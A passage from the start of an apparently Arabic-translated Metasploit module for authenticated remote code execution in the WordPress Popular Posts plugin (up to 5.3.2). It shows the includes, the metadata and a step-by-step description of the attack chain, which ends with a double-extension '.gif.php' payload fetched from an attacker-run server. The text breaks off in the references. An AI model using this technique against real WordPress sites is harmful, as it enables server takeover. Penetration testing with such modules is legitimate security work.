
### تتطلب هذه الوحدة Metasploit: https://metasploit.com/download# المصدر الحالي: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ يتطلب هذا الاستغلال من Metasploit أن يكون لديه اسم نطاق مؤهل بالكامل (FQDN) والقدرة على تشغيل خادم ويب للحمولة على المنفذ 80 أو 443 أو 8080. يجب أيضاً ألا يحل اسم النطاق المؤهل بالكامل إلى عنوان محجوز (192/172/127/10). يجب أن يستجيب الخادم أيضاً لطلب HEAD للحمولة، قبل تلقي طلب GET. يستغل هذا الاستغلال التحقق غير السليم من المدخلات المُوثَّق في إضافة ووردبريس Popular Posts <= 5.3.2. سلسلة الاستغلال معقدة إلى حد ما. مطلوب المصادقة ومكتبة 'gd' للPHP على الخادم. ثم يتم إعادة تكوين إضافة Popular Post للسماح بعنوان URL عشوائي لصورة المنشور في القطعة (widget). يتم إنشاء منشور، ثم تُرسل طلبات إلى المنشور لجعله أكثر شيوعاً من المنشور السابق رقم 1 بمقدار 5. بمجرد أن يصل المنشور إلى المراكز الخمسة الأولى، وبعد تحديث ذاكرة التخزين المؤقت للخادم لمدة 60 ثانية (ننتظر 90)، يتم تحميل قطعة الصفحة الرئيسية مما يؤدي إلى قيام الإضافة بتنزيل الحمولة من خادمنا. تحتوي حمولتنا على رأس 'GIF'، و امتداد مزدوج ('.gif.php') مما يسمح بتنفيذ كود PHP عشوائي. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wo